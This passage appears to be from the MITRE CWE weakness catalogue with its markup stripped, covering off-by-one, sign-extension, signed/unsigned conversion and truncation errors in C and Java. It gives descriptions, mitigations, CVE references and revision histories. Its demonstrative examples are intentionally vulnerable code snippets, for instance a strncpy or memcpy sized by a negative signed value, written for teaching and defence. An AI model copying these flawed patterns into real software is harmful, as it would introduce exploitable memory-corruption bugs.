s;unsigned int sz; + i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} + /* s is sign-extended and saved in sz */sz = s; + /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); + input = GetUserInput("Enter pathname:"); + /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); + } + + This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). + + + + + Integer coercion error + + + INT02-C + Understand integer conversion rules + + + INT05-C + Do not use input functions to convert character data if they cannot handle all possible inputs + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + Exact + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Within C, it might be that "coercion" is semantically different than "casting", possibly depending on whether the programmer directly specifies the conversion, or if the compiler does it implicitly. This has implications for the presentation of this entry and others, such as CWE-681, and whether there is enough of a difference for these entries to be split. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Maintenance_Notes, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value. + + + + + + + + + + + + + off-by-five + An "off-by-five" error was reported for sudo in 2002 (CVE-2002-0184), but that is more like a "length calculation" error. + + + + + Implementation + + + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Instability + This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. + + + Integrity + Modify Memory + If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. + + + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + When copying character arrays or using character manipulation methods, the correct size parameter must be used to account for the null terminator that needs to be added at the end of the array. Some examples of functions susceptible to this weakness in C include strcpy(), strncpy(), strcat(), strncat(), printf(), sprintf(), scanf() and sscanf(). + + + + + The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. + + int i;unsigned int numWidgets;Widget **WidgetList; + numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); + + However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. + + + In this example, the code does not account for the terminating null character, and it writes one byte beyond the end of the buffer. + The first call to strncat() appends up to 20 characters plus a terminating null character to fullname[]. There is plenty of allocated space for this, and there is no weakness associated with this first call. However, the second call to strncat() potentially appends another 20 characters. The code does not account for the terminating null character that is automatically added by strncat(). This terminating null character would be written one byte beyond the end of the fullname[] buffer. Therefore an off-by-one error exists with the second strncat() call, as the third argument should be 19. + + char firstname[20];char lastname[20];char fullname[40];fullname[0] = '\0';strncat(fullname, firstname, 20);strncat(fullname, lastname, 20); + + When using a function like strncat() one must leave a free byte at the end of the buffer for a terminating null character, thus avoiding the off-by-one weakness. Additionally, the last argument to strncat() is the number of characters to append, which must be less than the remaining space in the buffer. Be careful not to just use the total size of the buffer. + + char firstname[20];char lastname[20];char fullname[40];fullname[0] = '\0';strncat(fullname, firstname, sizeof(fullname)-strlen(fullname)-1);strncat(fullname, lastname, sizeof(fullname)-strlen(fullname)-1); + + + + The Off-by-one error can also be manifested when reading characters from a character array within a for loop that has an incorrect continuation condition. + + #define PATH_SIZE 60 + char filename[PATH_SIZE]; + for(i=0; i<=PATH_SIZE; i++) { + + char c = getc();if (c == 'EOF') {filename[i] = '\0';} + filename[i] = getc(); + } + + In this case, the correct continuation condition is shown below. + + for(i=0; i<PATH_SIZE; i++) {... + + + + As another example the Off-by-one error can occur when using the sprintf library function to copy a string variable to a formatted string variable and the original string variable comes from an untrusted source. As in the following example where a local function, setFilename is used to store the value of a filename to a database but first uses sprintf to format the filename. The setFilename function includes an input parameter with the name of the file that is used as the copy source in the sprintf function. The sprintf function will copy the file name to a char array of size 20 and specifies the format of the new variable as 16 characters followed by the file extension .dat. + + int setFilename(char *filename) {char name[20];sprintf(name, "%16s.dat", filename);int success = saveFormattedFilenameToDB(name);return success;} + + However this will cause an Off-by-one error if the original filename is exactly 16 characters or larger because the format of 16 characters with the file extension is exactly 20 characters and does not take into account the required null terminator that will be placed at the end of the string. + + + + + CVE-2003-0252 + Off-by-one error allows remote attackers to cause a denial of service and possibly execute arbitrary code via requests that do not contain newlines. + https://www.cve.org/CVERecord?id=CVE-2003-0252 + + + CVE-2001-1391 + Off-by-one vulnerability in driver allows users to modify kernel memory. + https://www.cve.org/CVERecord?id=CVE-2001-1391 + + + CVE-2002-0083 + Off-by-one error allows local users or remote malicious servers to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2002-0083 + + + CVE-2002-0653 + Off-by-one buffer overflow in function usd by server allows local users to execute arbitrary code as the server user via .htaccess files with long entries. + https://www.cve.org/CVERecord?id=CVE-2002-0653 + + + CVE-2002-0844 + Off-by-one buffer overflow in version control system allows local users to execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2002-0844 + + + CVE-1999-1568 + Off-by-one error in FTP server allows a remote attacker to cause a denial of service (crash) via a long PORT command. + https://www.cve.org/CVERecord?id=CVE-1999-1568 + + + CVE-2004-0346 + Off-by-one buffer overflow in FTP server allows local users to gain privileges via a 1024 byte RETR command. + https://www.cve.org/CVERecord?id=CVE-2004-0346 + + + CVE-2004-0005 + Multiple buffer overflows in chat client allow remote attackers to cause a denial of service and possibly execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2004-0005 + + + CVE-2003-0356 + Multiple off-by-one vulnerabilities in product allow remote attackers to cause a denial of service and possibly execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2003-0356 + + + CVE-2001-1496 + Off-by-one buffer overflow in server allows remote attackers to cause a denial of service and possibly execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2001-1496 + + + CVE-2004-0342 + This is an interesting example that might not be an off-by-one. + https://www.cve.org/CVERecord?id=CVE-2004-0342 + + + CVE-2001-0609 + An off-by-one enables a terminating null to be overwritten, which causes 2 strings to be merged and enable a format string. + https://www.cve.org/CVERecord?id=CVE-2001-0609 + + + CVE-2002-1745 + Off-by-one error allows source code disclosure of files with 4 letter extensions that match an accepted 3-letter extension. + https://www.cve.org/CVERecord?id=CVE-2002-1745 + + + CVE-2002-1816 + Off-by-one buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2002-1816 + + + CVE-2002-1721 + Off-by-one error causes an snprintf call to overwrite a critical internal variable with a null value. + https://www.cve.org/CVERecord?id=CVE-2002-1721 + + + CVE-2003-0466 + Off-by-one error in function used in many products leads to a buffer overflow during pathname management, as demonstrated using multiple commands in an FTP server. + https://www.cve.org/CVERecord?id=CVE-2003-0466 + + + CVE-2003-0625 + Off-by-one error allows read of sensitive memory via a malformed request. + https://www.cve.org/CVERecord?id=CVE-2003-0625 + + + CVE-2006-4574 + Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion. + https://www.cve.org/CVERecord?id=CVE-2006-4574 + + + + + Off-by-one Error + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is not always a buffer overflow. For example, an off-by-one error could be a factor in a partial comparison, a read from the wrong memory location, an incorrect conditional, etc. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Common_Consequences, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated References + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-06-20 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses. + + + + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Other + Read Memory + Modify Memory + Other + When an unexpected sign extension occurs in code that operates directly on memory buffers, such as a size value or a memory index, then it could cause the program to write or read outside the boundaries of the intended buffer. If the numeric value is associated with an application-level resource, such as a quantity or price for a product in an e-commerce site, then the sign extension could produce a value that is much higher (or lower) than the application's allowable range. + + + + + Implementation + Avoid using signed variables if you don't need to represent negative values. When negative values are needed, perform validation after you save those values to larger data types, or before passing them to functions that are expecting unsigned values. + + + + + The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. + + int GetUntrustedInt () {return(0x0000FFFF);} + void main (int argc, char **argv) { + char path[256];char *input;int i;short s;unsigned int sz; + i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} + /* s is sign-extended and saved in sz */sz = s; + /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); + input = GetUserInput("Enter pathname:"); + /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); + } + + This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). + + + + + CVE-2018-10887 + Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) + https://www.cve.org/CVERecord?id=CVE-2018-10887 + + + CVE-1999-0234 + Sign extension error produces -1 value that is treated as a command separator, enabling OS command injection. + https://www.cve.org/CVERecord?id=CVE-1999-0234 + + + CVE-2003-0161 + Product uses "char" type for input character. When char is implemented as a signed type, ASCII value 0xFF (255), a sign extension produces a -1 value that is treated as a program-specific separator value, effectively disabling a length check and leading to a buffer overflow. This is also a multiple interpretation error. + https://www.cve.org/CVERecord?id=CVE-2003-0161 + + + CVE-2007-4988 + chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2007-4988 + + + CVE-2006-1834 + chain: signedness error allows bypass of a length check; later sign extension makes exploitation easier. + https://www.cve.org/CVERecord?id=CVE-2006-1834 + + + CVE-2005-2753 + Sign extension when manipulating Pascal-style strings leads to integer overflow and improper memory copy. + https://www.cve.org/CVERecord?id=CVE-2005-2753 + + + + + Sign extension error + + + SFP1 + Glitch in computation + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + CWE More Specific + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Sign extension errors can lead to buffer overflows and other memory-based problems. They are also likely to be factors in other weaknesses that are not based on memory operations, but rely on numeric calculation. + This entry is closely associated with signed-to-unsigned conversion errors (CWE-195) and other numeric errors. These relationships need to be more closely examined within CWE. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-05 + complete rewrite of the entire entry + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Sign Extension Error + Incorrect Sign Extension + + + + The product uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive. + + It is dangerous to rely on implicit casts between signed and unsigned numbers because the result can take on an unexpected value and violate assumptions made by the program. + Often, functions will return negative values to indicate a failure. When the result of a function is to be used as a size parameter, using these negative return values can have unexpected results. For example, if negative size values are passed to the standard memory copy or allocation functions they will be implicitly cast to a large unsigned value. This may lead to an exploitable buffer overflow or underflow condition. + + + + + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + Conversion between signed and unsigned values can lead to a variety of errors, but from a security standpoint is most commonly associated with integer overflow and buffer overflow vulnerabilities. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned. + + unsigned int readdata () {int amount = 0;...if (result == ERROR)amount = -1;...return amount;} + + If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. + + + In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number. + + unsigned int readdata () {int amount = 0;...amount = accessmainframe();...return amount;} + + If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. + + + The following code is intended to read an incoming packet from a socket and extract one or more headers. + + DataPacket *packet;int numHeaders;PacketHeader *headers; + sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; + if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); + + The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. + + + This example processes user input comprised of a series of variable-length structures. The first 2 bytes of input dictate the size of the structure to be processed. + + char* processNext(char* strm) {char buf[512];short len = *(short*) strm;strm += sizeof(len);if (len <= 512) {memcpy(buf, strm, len);process(buf);return strm + len;}else {return -1;}} + + The programmer has set an upper bound on the structure size: if it is larger than 512, the input will not be processed. The problem is that len is a signed short, so the check against the maximum structure length is done with signed values, but len is converted to an unsigned integer for the call to memcpy() and the negative bit will be extended to result in a huge value for the unsigned integer. If len is negative, then it will appear that the structure has an appropriate size (the if branch will be taken), but the amount of memory copied by memcpy() will be quite large, and the attacker will be able to overflow the stack with data in strm. + + + In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: + + int returnChunkSize(void *) { + + + /* if chunk info is valid, return the size of usable memory, + + + * else, return -1 to indicate an error + + + */ + ... + }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} + + If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). + + + This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. + + int proc_msg(char *s, int msg_len) + { + + // Note space at the end of the string - assume all strings have preamble with space + int pre_len = sizeof("preamble: "); + char buf[pre_len - msg_len]; + ... Do processing here if we get this far + + } + char *s = "preamble: message\n"; + char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) + int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length + int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack + + The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. + + + + + CVE-2007-4268 + Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) + https://www.cve.org/CVERecord?id=CVE-2007-4268 + + + + + Signed to unsigned conversion error + + + SFP1 + Glitch in computation + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + CWE More Specific + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive. + Although less frequent an issue than signed-to-unsigned conversion, unsigned-to-signed conversion can be the perfect precursor to dangerous buffer underwrite conditions that allow attackers to move down the stack where they otherwise might not have access in a normal buffer overflow condition. Buffer underwrites occur frequently when large unsigned values are cast to signed values, and then used as indexes into a buffer or for pointer arithmetic. + + + + + + + + + + + + + + Implementation + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + Incorrect sign conversions generally lead to undefined behavior, and therefore crashes. + + + Integrity + Modify Memory + If a poor cast lead to a buffer overflow or similar condition, data integrity may be affected. + + + Integrity + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Improper signed-to-unsigned conversions without proper checking can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. + + + + + Requirements + Choose a language which is not subject to these casting flaws. + + + Architecture and Design + Design object accessor functions to implicitly check values for valid sizes. Ensure that all functions which will be used as a size are checked previous to use as a size. If the language permits, throw exceptions rather than using in-band errors. + + + Implementation + Error check the return values of all functions. Be aware of implicit casts made, and use unsigned variables for sizes if at all possible. + + + + + Unsigned to signed conversion error + + + SFP1 + Glitch in computation + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion. + When a primitive is cast to a smaller primitive, the high order bits of the large value are lost in the conversion, potentially resulting in an unexpected value that is not equal to the original value. This value may be required as an index into a buffer, a loop iterator, or simply necessary state data. In any case, the value cannot be trusted and the system will be in an undefined state. While this method may be employed viably to isolate the low bits of a value, this usage is rare, and truncation usually implies that an implementation error has occurred. + + + + + + + + + + + + + + + + + + Implementation + + + Low + + + Integrity + Modify Memory + The true value of the data is lost and corrupted data is used. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Ensure that no casts, implicit or explicit, take place that move from a larger size primitive or a smaller size primitive. + + + + + This example, while not exploitable, shows the possible mangling of values associated with truncation errors: + + int intPrimitive;short shortPrimitive;intPrimitive = (int)(~((int)0) ^ (1 << (sizeof(int)*8-1)));shortPrimitive = intPrimitive;printf("Int MAXINT: %d\nShort MAXINT: %d\n", intPrimitive, shortPrimitive); + + The above code, when compiled and run on certain systems, returns the following output: + + Int MAXINT: 2147483647Short MAXINT: -1 + + This problem may be exploitable when the truncated value is used as an array index, which can happen implicitly when 64-bit values are used as indexes, as they are truncated to 32 bits. + + + In the following Java example, the method updateSalesForProduct is part of a business application class that updates the sales information for a particular product. The method receives as arguments the product ID and the integer amount sold. The product ID is used to retrieve the total product count from an inventory object which returns the count as an integer. Before calling the method of the sales object to update the sales count the integer values are converted to The primitive type short since the method requires short type for the method arguments. + + ... + // update sales database for number of product sold with product ID + public void updateSalesForProduct(String productID, int amountSold) { + + + // get the total number of products in inventory database + int productCount = inventory.getProductCount(productID); + // convert integer values to short, the method for the + + + // sales object requires the parameters to be of type short + short count = (short) productCount;short sold = (short) amountSold; + // update sales database for product + sales.updateSalesCount(productID, count, sold); + }... + + However, a numeric truncation error can occur if the integer values are higher than the maximum value allowed for the primitive type short. This can cause unexpected results or loss or corruption of data. In this case the sales database may be corrupted with incorrect data. Explicit casting from a from a larger size primitive type to a smaller size primitive type should be prevented. The following example an if statement is added to validate that the integer values less than the maximum value for the primitive type short before the explicit cast and the call to the sales method. + + ... + // update sales database for number of product sold with product ID + public void updateSalesForProduct(String productID, int amountSold) { + + + // get the total number of products in inventory database + int productCount = inventory.getProductCount(productID); + // make sure that integer numbers are not greater than + + + // maximum value for type short before converting + if ((productCount < Short.MAX_VALUE) && (amountSold < Short.MAX_VALUE)) { + + + // convert integer values to short, the method for the + + + // sales object requires the parameters to be of type short + short count = (short) productCount;short sold = (short) amountSold; + // update sales database for product + sales.updateSalesCount(productID, count, sold); + + else { + // throw exception or perform other processing + + ...} + }... + + + + + + CVE-2020-17087 + Chain: integer truncation (CWE-197) causes small buffer allocation (CWE-131) leading to out-of-bounds write (CWE-787) in kernel pool, as exploited in the wild per CISA KEV. + 